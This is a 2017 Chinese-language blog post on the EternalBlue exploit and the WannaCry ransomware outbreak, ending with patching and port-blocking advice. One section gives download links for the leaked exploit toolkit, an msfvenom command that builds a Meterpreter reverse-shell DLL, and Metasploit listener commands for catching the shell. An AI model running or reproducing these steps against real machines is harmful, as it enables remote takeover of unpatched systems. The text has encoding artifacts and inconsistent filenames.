永恒之藍(lán),永恒之藍(lán)勒索病毒,中了永恒之藍(lán)病毒勒索怎么辦?

永恒

如果確定,已經(jīng)中了勒索病毒,那么無(wú)藥可救,因?yàn)樗募用芊绞?,和RAR加密一樣,除了字典辦法沒(méi)辦法破解,當(dāng)初可以等國(guó)外技術(shù)大神,出破解他加密軟件的辦法。

我們來(lái)看看他的侵入方法:

 

Shadow Brokers再次泄露出一份震驚世界的機(jī)密文檔,其中包含了多個(gè)精美的 Windows 遠(yuǎn)程漏洞利用工具,可以覆蓋大量的 Windows 服務(wù)器,一夜之間所有Windows服務(wù)器幾乎全線暴露在危險(xiǎn)之中,任何人都可以直接下載并遠(yuǎn)程攻擊利用,考慮到國(guó)內(nèi)不少高校、政府、國(guó)企甚至還有一些互聯(lián)網(wǎng)公司還在使用 Windows 服務(wù)器,這次事件影響力堪稱網(wǎng)絡(luò)大地震。

目前已知受影響的 Windows 版本包括但不限于:Windows NT,Windows 2000(沒(méi)錯(cuò),古董也支持)、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

故事還要從一年前說(shuō)起,2016 年 8 月有一個(gè) “Shadow Brokers” 的黑客組織號(hào)稱入侵了方程式組織竊取了大量機(jī)密文件,并將部分文件公開到了互聯(lián)網(wǎng)上,方程式(Equation Group)據(jù)稱是 NSA(美國(guó)國(guó)家安全局)下屬的黑客組織,有著極高的技術(shù)手段。這部分被公開的文件包括不少隱蔽的地下的黑客工具。另外 “Shadow Brokers” 還保留了部分文件,打算以公開拍賣的形式出售給出價(jià)最高的競(jìng)價(jià)者,“Shadow Brokers” 預(yù)期的價(jià)格是 100 萬(wàn)比特幣(價(jià)值接近5億美金)。這一切聽起來(lái)難以置信,以至于當(dāng)時(shí)有不少安全專家對(duì)此事件保持懷疑態(tài)度,“Shadow Brokers” 的拍賣也因此一直沒(méi)有成功。

北京時(shí)間 2017 年 4 月 14 日晚,“Shadow Brokers” 終于忍不住了,在推特上放出了他們當(dāng)時(shí)保留的部分文件,解壓密碼是 “Reeeeeeeeeeeeeee”。

方程式ETERNALBLUE 下載地址
推特 https://yadi.sk/d/NJqzpqo_3GxZA4
github https://github.com/x0rz/EQGRP_Lost_in_Translation

Pyhthon環(huán)境配置
python-2.6.6.msi  https://www.python.org/download/releases/2.6.6/
win32模塊文件pywin32-221.win-amd64-py2.6.exe  鏈接: https://pan.baidu.com/s/1nu8KXPB 密碼: hy7e

機(jī)器
攻擊機(jī)器Windows 7:192.168.1.108
攻擊機(jī)器Ubuntu :192.168.1.109
目標(biāo)機(jī)器Windows 7 x64(沒(méi)安裝過(guò)SBM補(bǔ)丁的,并且關(guān)閉防火墻):192.168.1.113

利用msf生成dll劫持文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=6566 -f dll > /opt/x.dll
將s.dll文件拷貝到windows2003的C盤目錄下:

在msf下開啟msfpaylod監(jiān)聽:
use exploit/multi/handler
set LHOST 192.168.1.109
set LPORT 6566
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
使用exp里執(zhí)行dll,就可以看到test.dll 反彈給Ubuntu的shell了。

除 Windows 以外,“Shadow Brokers” 泄露的數(shù)據(jù)還顯示方程式攻擊了中東一些使用了 Swift 銀行結(jié)算系統(tǒng)的銀行。

緩解措施

所有 Windows 服務(wù)器、個(gè)人電腦,包括 XP/2003/Win7/Win8,Win 10 最好也不要漏過(guò),全部使用防火墻過(guò)濾/關(guān)閉 137、139、445端口;對(duì)于 3389 遠(yuǎn)程登錄,如果不想關(guān)閉的話,至少要關(guān)閉智能卡登錄功能。

 

5月12日下午,編輯曾在讀者群眾收到爆料,有一高校學(xué)生的電腦中了勒索病毒,且勒索內(nèi)容太特別搞笑:要求盡快支付勒索贖金,否則將刪除文件,甚至提出半年后如果還沒(méi)支付的窮人可以參加免費(fèi)解壓的活動(dòng)。原來(lái)以為這只是個(gè)小范圍的惡作劇式的勒索軟件,沒(méi)想到昨晚該勒索軟件大面積爆發(fā),許多高校學(xué)生中招,愈演愈烈。

SOS!NSA “永恒之藍(lán)”勒索蠕蟲昨夜大面積爆發(fā),現(xiàn)許多高校已被勒索

今早,雷鋒網(wǎng)發(fā)現(xiàn),原來(lái),5月12日起,全球范圍內(nèi)爆發(fā)基于Windows網(wǎng)絡(luò)共享協(xié)議進(jìn)行攻擊傳播的蠕蟲惡意代碼,這是不法分子通過(guò)改造之前泄露的NSA黑客武器庫(kù)中“永恒之藍(lán)”攻擊程序發(fā)起的網(wǎng)絡(luò)攻擊事件,用戶只要開機(jī)上網(wǎng)就可被攻擊。五個(gè)小時(shí)內(nèi),包括英國(guó)、俄羅斯、整個(gè)歐洲以及國(guó)內(nèi)多個(gè)高校校內(nèi)網(wǎng)、大型企業(yè)內(nèi)網(wǎng)和政府機(jī)構(gòu)專網(wǎng)中招,被勒索支付高額贖金才能解密恢復(fù)文件,對(duì)重要數(shù)據(jù)造成嚴(yán)重?fù)p失。

最可怕的是,這是不法分子利用NSA黑客武器庫(kù)泄漏的“永恒之藍(lán)”發(fā)起的蠕蟲病毒攻擊傳播勒索惡意事件。惡意代碼會(huì)掃描開放445文件共享端口的Windows機(jī)器,無(wú)需用戶任何操作,只要開機(jī)上網(wǎng),不法分子就能在電腦和服務(wù)器中植入勒索軟件、遠(yuǎn)程控制木馬、虛擬貨幣挖礦機(jī)等惡意程序。

近日,多個(gè)高校淪陷于比特幣病毒。這種病毒致使許多高校畢業(yè)生的畢業(yè)論文(設(shè)計(jì))被鎖,支付高額贖金后才能解密。
根據(jù)網(wǎng)絡(luò)安全機(jī)構(gòu)通報(bào),這是不法分子利用NSA黑客武器庫(kù)泄漏的“永恒之藍(lán)”發(fā)起的病毒攻擊事件。“永恒之藍(lán)”會(huì)掃描開放445文件共享端口的Windows機(jī)器,無(wú)需用戶任何操作,只要開機(jī)上網(wǎng),不法分子就能在電腦遠(yuǎn)程木馬控制并攻擊。據(jù)有關(guān)機(jī)構(gòu)統(tǒng)計(jì),目前國(guó)內(nèi)平均每天有5000多臺(tái)機(jī)器遭到NSA“永恒之藍(lán)”黑客武器的遠(yuǎn)程攻擊,教育網(wǎng)就是受攻擊的重災(zāi)區(qū)!
為了防范病毒,請(qǐng)遵守以下防范措施:
1、為計(jì)算機(jī)安裝最新的安全補(bǔ)丁,微軟已發(fā)布補(bǔ)丁MS17-010修復(fù)了“永恒之藍(lán)”攻擊的系統(tǒng)漏洞,請(qǐng)盡快安裝此安全補(bǔ)丁,網(wǎng)址為O網(wǎng)頁(yè)鏈接
2、關(guān)閉445、135、137、138、139端口,關(guān)閉網(wǎng)絡(luò)共享。
3、強(qiáng)化網(wǎng)絡(luò)安全意識(shí):不明鏈接不要點(diǎn)擊,不明文件不要下載,不明郵件不要打開。
4、盡快(今后定期)備份自己電腦中的重要文件資料到移動(dòng)硬盤、U盤,備份完后脫機(jī)保存該磁盤。
5、建議仍在使用windows xp, windows 2003操作系統(tǒng)的用戶盡快升級(jí)到 window 7/windows 10,或 windows 2008/2012/2016操作系統(tǒng)。
6、安裝正版操作系統(tǒng)、Office軟件等。

在此,校會(huì)提示:一定要做好對(duì)比特幣病毒的防范!謹(jǐn)慎使用電腦,特別是對(duì)于校園網(wǎng)和教育網(wǎng)的使用!重要文件及時(shí)在網(wǎng)盤備份,尤其是即將進(jìn)行畢業(yè)答辯的師兄師姐及搞科研的同學(xué)和老師,一定要保護(hù)好自己的畢業(yè)論文和科研論文等文件

更多
  • 該日志由 于2017年05月13日發(fā)表在 未分類 分類下, 你可以發(fā)表評(píng)論,并在保留原文地址 及作者的情況下引用到你的網(wǎng)站或博客。
  • 本文鏈接: 永恒之藍(lán),永恒之藍(lán)勒索病毒,中了永恒之藍(lán)病毒勒索怎么辦? | 幫助信息-動(dòng)天數(shù)據(jù)
  • 版權(quán)所有: 幫助信息-動(dòng)天數(shù)據(jù)-轉(zhuǎn)載請(qǐng)標(biāo)明出處
  • 【上一篇】 【下一篇】

    0 Comments.

    發(fā)表評(píng)論